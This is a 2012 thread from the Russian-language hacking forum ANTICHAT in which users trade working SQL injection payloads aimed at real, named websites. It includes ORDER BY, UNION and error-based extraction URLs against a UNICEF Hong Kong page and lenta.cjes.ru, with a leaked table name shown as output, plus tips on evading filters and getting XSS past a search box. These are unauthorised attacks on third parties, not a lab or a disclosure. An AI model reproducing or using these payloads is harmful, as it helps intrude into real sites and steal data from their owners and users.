ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
21.01.2012, 10:24
|
|
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094
Репутация:
672
|
|
Сообщение от narviss
narviss said:
нет, неполучается...нужно чонить без точки=( каким запросом заменить можно?
точьку ничем не заменишь, попробуй urlencode, хотя врятли поможет
. = %2E
|
|
|
21.01.2012, 10:29
|
|
Guest
Сообщений: n/a
Провел на форуме:
102354
Репутация:
267
|
|
Сообщение от narviss
narviss said:
нет, неполучается...нужно чонить без точки=( каким запросом заменить можно?
Как вариант, пробуй:
infOrmAtion_schEma./**/tabLeS
P.S. Обход точки невозможен. Придется угадать таблицы.
|
|
|
|
21.01.2012, 12:29
|
|
Guest
Сообщений: n/a
Провел на форуме:
35174
Репутация:
-6
|
|
I got the "order by" here.
Код:
Code:
https://www.unicef.org.hk/news/list_detail.php?id=234+order+by+17--+-
Now "union select" does not work.
Код:
Code:
https://www.unicef.org.hk/news/list_detail.php?id=234+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17--+-
Код:
Code:
https://www.unicef.org.hk/news/list_detail.php?id=234%27%20and%28select%201%20from%28select%20count%28*%29,concat%28%28select%20%28selectconcat%280x7e,0x27,cast%28version%28%29%20as%20char%29,0x27,0x7e%29%29%20from%20information_schema.tables%20limit%200,1%29,floor%28rand%280%29*2%29%29x%20frominformation_schema.tables%20group%20by%20x%29a%29%20and%201=1+--+
Where is my fault now? |
|
|
|
21.01.2012, 17:30
|
|
Guest
Сообщений: n/a
Провел на форуме:
124363
Репутация:
11
|
|
что то не могу дальше вывести
Код:
Code:
http://www.lenta.cjes.ru/
?nid=1089' and (1)=(select 1 from(select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a)-- x
|
|
|
|
21.01.2012, 17:34
|
|
Guest
Сообщений: n/a
Провел на форуме:
102354
Репутация:
267
|
|
2Faaax,
Код:
Code:
http://www.lenta.cjes.ru/?m=1&y=2012&lang=rus&nid=1089'+and(select+1+from(select+count(*),concat((select+concat(table_name,0x00)+from+information_schema.tables+limit+1,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)--+f
Результат:
Код:
Code:
Duplicate entry 'COLLATIONS' for key 1
|
|
|
|
21.01.2012, 23:29
|
|
Постоянный
Регистрация: 15.03.2008
Сообщений: 441
Провел на форуме:
2052341
Репутация:
95
|
|
Проблема с XSS. Пока что не хочу давать линк... проблема в том, что я хочу, чтоб при вводе в поиск вылетел алерт. Что я только не пробовал, но результат один и тот же:
ввожу alert(), нажимаю Ентер, в поиске остается alert() - вывод [B]">
|
|
|
|
21.01.2012, 23:52
|
|
Guest
Сообщений: n/a
Провел на форуме:
102354
Репутация:
267
|
|
Сообщение от jecka3000
jecka3000 said:
Какие есть еще варианты?
Ссылку покажи.
|
|
|
|
22.01.2012, 03:41
|
|
Познающий
Регистрация: 03.02.2009
Сообщений: 49
Провел на форуме:
3317712
Репутация:
403
|
|
Код:
Code:
http://brandkom.com.ua/shop_content.php?coID=10
Есть уязвимость тут? |
|
|
|
22.01.2012, 08:33
|
|
Guest
Сообщений: n/a
Провел на форуме:
102354
Репутация:
267
|
|
Сообщение от _Spamer_
_Spamer_ said:
Код:
Code:
http://brandkom.com.ua/shop_content.php?coID=10
Есть уязвимость тут? Не думаю. Так как в твоем случаи:
Код:
Code:
+and+1=1 true
+and+1=0 true
Да и ничего не меняется при вставке кавычки.
|
|
|
|
22.01.2012, 15:31
|
|
Новичок
Регистрация: 04.11.2004
Сообщений: 5
Провел на форуме:
4512
Репутация:
0
|
|
jecka3000, вариантов очень много. Для начала надо определить, какие теги пропускает фильтр и в зависимости от этого использовать события. Все зависит от конкретного сайта. Скинь ссылку в личку, если не хочешь выкладывать в теме.
|
|
|
|
|
|
|
|
Здесь присутствуют: 3 (пользователей: 0 , гостей: 3)
|
|
|
|
Похожие темы
Линейный вид
